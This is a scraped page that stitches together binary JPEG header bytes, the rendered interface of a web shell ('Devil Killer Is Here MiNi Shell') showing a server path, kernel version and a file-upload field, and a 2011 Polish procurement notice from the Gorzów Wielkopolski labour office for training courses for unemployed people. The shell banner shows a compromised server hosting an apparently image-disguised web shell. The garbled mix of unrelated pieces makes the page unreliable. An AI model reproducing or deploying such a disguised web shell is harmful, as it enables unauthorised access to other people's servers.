JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/141857-N-2011.html

<p class="kh_header"><b>Gorzów Wielkopolski: szkolenia dla bezrobotnych i poszukujących pracy (znak AG-0202-2/2011)</b><br>
<b>Numer ogłoszenia: 141857 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Walczaka 110, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 736 06 43, faks 0-95 736 06 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenia dla bezrobotnych i poszukujących pracy (znak AG-0202-2/2011).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych i poszukujących pracy m.in.: młodzieży poniżej 25 roku życia, osób długotrwale bezrobotnych, pow. 50 roku życia, osób niepełnosprawnych, współfinansowanych ze środków Funduszu Pracy, PFRON, Unii Europejskiej - Europejskiego Funduszu Społecznego w zakresie szkoleń o następującej tematyce:
1)	Kurs magazyniera z obsługą wózków jezdniowych i komputera (10 osób) 
2)	Kurs pilarza-drwala (10 osób)
3)	Kurs ochrona osób i mienia I stopnia (6 osób)
4)	Kurs ochrona osób i mienia II stopnia (6 osób)
5)	Kurs księgowo-kadrowy kadrowy z obsługą programów komputerowych wykorzystywanych 
w księgowości i kadrach  (10 osób) 
6)	Kurs kadry i płace (10 osób) 
7)	Kurs kancelaryjno-archiwalny I i II stopnia (10 osób)
8)	Kurs telemarketera z obsługą komputera (10 osób)
9)	Kurs przedstawiciela handlowego z obsługą komputera (10 osób).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1)	Kurs magazyniera z obsługą wózków jezdniowych i komputera (5 osób) 
2)	Kurs pilarza-drwala (5 osób)
3)	Kurs ochrona osób i mienia I stopnia (3 osób)
4)	Kurs ochrona osób i mienia II stopnia (3 osób)
5)	Kurs księgowo-kadrowy kadrowy z obsługą programów komputerowych wykorzystywanych 
w księgowości i kadrach  (5 osób) 
6)	Kurs kadry i płace (5 osób) 
7)	Kurs kancelaryjno-archiwalny I i II stopnia (5 osób)
8)	Kurs telemarketera z obsługą komputera (5 osób)
9)	Kurs przedstawiciela handlowego z obsługą komputera (5 osób)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy (podstawa prawna: ustawa o promocji zatrudnienia i instytucjach rynku pracy - Dz. U. Nr 69, poz. 415 z 2008 z późn. zm.) - dotyczy wszystkich części zamówienia. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany, jeśli wykonawca wykaże do każdej części zamówienia wykonanie 3 szkoleń grupowych w ciągu ostatnich 3 lat o kierunku zgodnym z częścią zamówienia oraz przedstawi do każdej części zamówienia min. 1 referencję potwierdzającą należyte wykonanie zamówienia zgodnego z częścią zamówienia. Przez szkolenie grupowe należy rozumieć grupę min. 8 osób szkolących się w tym samym miejscu i czasie, tj. na tych samych zajęciach, chyba że, ze względu na specyfikę szkolenia lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w  różnych salach.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże do każdej części zamówienia minimum:  
1)	Kurs magazyniera z obsługą wózków jezdniowych i komputera (10 osób):  1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), wózki jezdniowe 2 szt. (z ważnym przeglądem technicznym), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy  z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, internet, program do obsługi magazynu - każdego po 10 szt. 

2)	Kurs pilarza-drwala (10 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), piły łańcuchowe (pilarki spalinowe) - 10 szt., wykaszarki (kosy spalinowe) - 3, siekiery - 4 szt., młoty - 4 szt., tirfory - 4 szt., pilniki - 4 szt., odzież ochronną przeciwprzepięciową (spodnie - 10 szt., zestaw rękawic - 10 szt. , koszule - 10 szt., kaski - 10 szt.).

3)	Kurs ochrona osób i mienia I stopnia (6 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), strzelnicę dopuszczoną do prowadzenia zajęć przez Policję, salę gimnastyczną, broń - 10 szt. 

4)	Kurs ochrona osób i mienia II stopnia (6 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), strzelnicę dopuszczoną do prowadzenia zajęć przez Policję, salę gimnastyczną, broń - 10 szt. 

5)	Kurs księgowo-kadrowy z obsługą programów komputerowych wykorzystywanych w księgowości i kadrach: 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, internet, program do obsługi księgowości i kadr - każdego po 10 szt. 

6)	Kurs kadry i płace (10 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, internet, program do obsługi księgowości i kadr - każdego po 10 szt. 

7)	Kurs kancelaryjono-archiwalny I i II stopnia (10 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, program do obsługi dokumentacji archiwum - 10 szt. 

8)	Kurs telemarketera z obsługą komputera (10 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, internet - 10 szt., kasy fiskalne - 10 szt., telefon - 1 szt. , fax, skaner i kopiarka  - po 1 szt. lub urządzenie wielofunkcyjne zawierające fax, skaner, kopiarkę - 1 szt.  

9)	Kurs przedstawiciela handlowego z obsługą komputera (10 osób): 1 salę wykładową dla 10 osób wyposażoną w stoliki i krzesła lub krzesła z pulpitem do pisania dla każdego uczestnika szkolenia, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika (książka lub skrypt, zeszyt lub notatnik, długopis - każdego po 10 szt.), zestawy komputerowe (komputer, monitor, klawiatura, mysz) lub laptopy z licencjonowanym oprogramowaniem komputerowym: Windows, pakiet Office, internet - 10 szt., kasy fiskalne - 10 szt., telefon - 1 szt. , fax, skaner i kopiarka l- po 1 szt. ub urządzenie wielofunkcyjne zawierające fax, skaner, kopiarkę - 1 szt. 

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże minimum 2 wykładowców/instruktorów do realizacji poszczególnych części zamówienia z następującymi kwalifikacjami:

1)	Kurs magazyniera z obsługą wózków jezdniowych i komputera (10 osób): osoby posiadające uprawnienia do kierowania wózkami jezdnowymi, które przeszkoliły min. 30 osób w ciągu ostatnich 3 lat na kursach zgodnych z częścią zamówienia,
2)	Kurs pilarza-drwala (10 osób): osoby posiadające uprawnieniami drwala-pilarza (ukończony kurs), które przeszkoliły min. 30 osób w ciągu ostatnich 3 lat na kursach zgodnych z częścią zamówienia, 
3)	Kurs ochrona osób i mienia I stopnia (6 osób): 1 osobę posiadającą uprawnienia pracownika ochrony (licencję) i 1 osobę z wykształceniem wyższym - zawód psycholog, które przeszkoliły min. 30 osób na kursach zgodnych z częścią zamówienia, 
4)	Kurs ochrona osób i mienia II stopnia (6 osób): 1 osobę posiadającą uprawnieniami pracownika ochrony (licencję) lub staż pracy i 1 osobę z wykształceniem wyższym - zawód psycholog, które przeszkoliły min. 30 osób na kursach zgodnych z częścią zamówienia, 
5)	Kurs księgowo-kadrowy kadrowy z obsługą programów komputerowych wykorzystywanych w księgowości i kadrach  (10 osób): osoby z wykształceniem średnim ekonomicznym lub wyższym ekonomicznym, które przeszkoliły min. 30 osób na kursach księgowości lub kadrowych w okresie ostatnich 3 lat, 
6)	Kurs kadry i płace (10 osób): osoby z wykształceniem średnim ekonomicznym lub wyższym ekonomicznym, które przeszkoliły min. 30 osób na kursach księgowości lub kadrowych w okresie ostatnich 3 lat, 
7)	Kurs kancelaryjno-archiwalny I i II stopnia (10 osób): osoby z wykształceniem minimum średnim, które posiadają uprawnienia archiwisty I lub II stopnia (ukończony kurs archiwisty) lub staż pracy w Archiwum Państwowym i przeszkoliły min. 30 osób na kursach archiwistów w okresie ostatnich 3 lat,
8)	Kurs telemarketera z obsługą komputera (10 osób):  1 osobę z wykształceniem minimum średnim ekonomicznym i 1 osobę z wykształceniem wyższym - zawód psycholog, które przeszkoliły min. 30 osób na kursach telemarketerów lub przedstawicieli handlowych, sprzedawców w okresie ostatnich 3 lat,
9)	Kurs przedstawiciela handlowego z obsługą komputera (10 osób): 1 osobę z wykształceniem minimum średnim ekonomicznym i 1 osobę z wykształceniem wyższym - zawód psycholog, które przeszkoliły min. 30 osób na kursach telemarketerów lub przedstawicieli handlowych, sprzedawców w okresie ostatnich 3 lat,
 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony po złożeniu oświadczenia zał. siwz.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest dołączyć do oferty następujące dokumenty:
a)	Odpowiednie pełnomocnictwa, tylko w sytuacjach określonych w Rozdziale I pkt 5 siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz);
b)	Oświadczenie o posiadaniu wpisu do rejestru instytucji szkoleniowych wojewódzkiego urzędu pracy,
c)	Kopie dokumentów potwierdzających jakość usług szkoleniowych (m.in. certyfikaty jakości usług szkoleniowych - ISO, akredytacje kuratora oświaty) potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Jakość - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>na warunkach określnych w umowie (wzór stanowi załącznik do siwz)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pup.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gorzowie Wlkp., ul. Walczaka 110, 66-400 Gorzów Wlkp., pok. nr 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 11:45, miejsce: Powiatowy Urząd Pracy w Gorzowie Wlkp., ul. Walczaka 110, sekretariat pok. 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie częściowo będzie finansowane w ramach środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki - Projekt Kameleon.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs magazyniera z obsługą wózków jezdniowych i komputera (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Liczba osób do przeszkolenia - 10.
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011 r., rozpoczęcie III kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 7 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu od godz. 8.00 - 18.00, min. 25 godzin w 1 tygodniu, 1 godzina zajęć trwa 45 minut+15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami.
-	Ilość godzin szkolenia - min. 210 godzin na 1 uczestnika, w tym:
Ilość godzin szkolenia teoretycznego - min. 50 godzin
-	Ilość godzin szkolenia praktycznego - min. 160 godzin.
Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku magazyniera z obsługą wózków jezdniowymi i komputera oraz zdobycie stosownych uprawnień. 
-	Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz musi zawierać następujące elementy: zasady pracy w magazynie, gospodarka magazynowa, ewidencja magazynowo-księgowa, typy stosowanych wózków jezdniowych, budowa i eksploatacja wózków, czynności kierowcy przy obsłudze wózków, bezpieczeństwo i higiena pracy w zawodzie kierowcy wózka jezdniowego, wiadomości z zakresu ładunkoznawstwa, praktyczna nauka jazdy wózkami, dozór techniczny dotyczący wózków, wymiana butli  gazowej, obsługa komputera z wykorzystaniem programów edytorskich m.in.WORD, EXCEL, Internet, obsługa programu komputerowego wykorzystywanego w magazynie. 
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji i wydaniem zaświadczenia - świadectwa kwalifikacyjnego kierowcy wózka jezdniowego (zgodnie z rozporządzeniem Ministra Gospodarki z dnia 18 lipca 2001r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych - Dz. U. Nr 70, poz. 650 oraz z 2003r. Nr 65, poz. 603). 

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
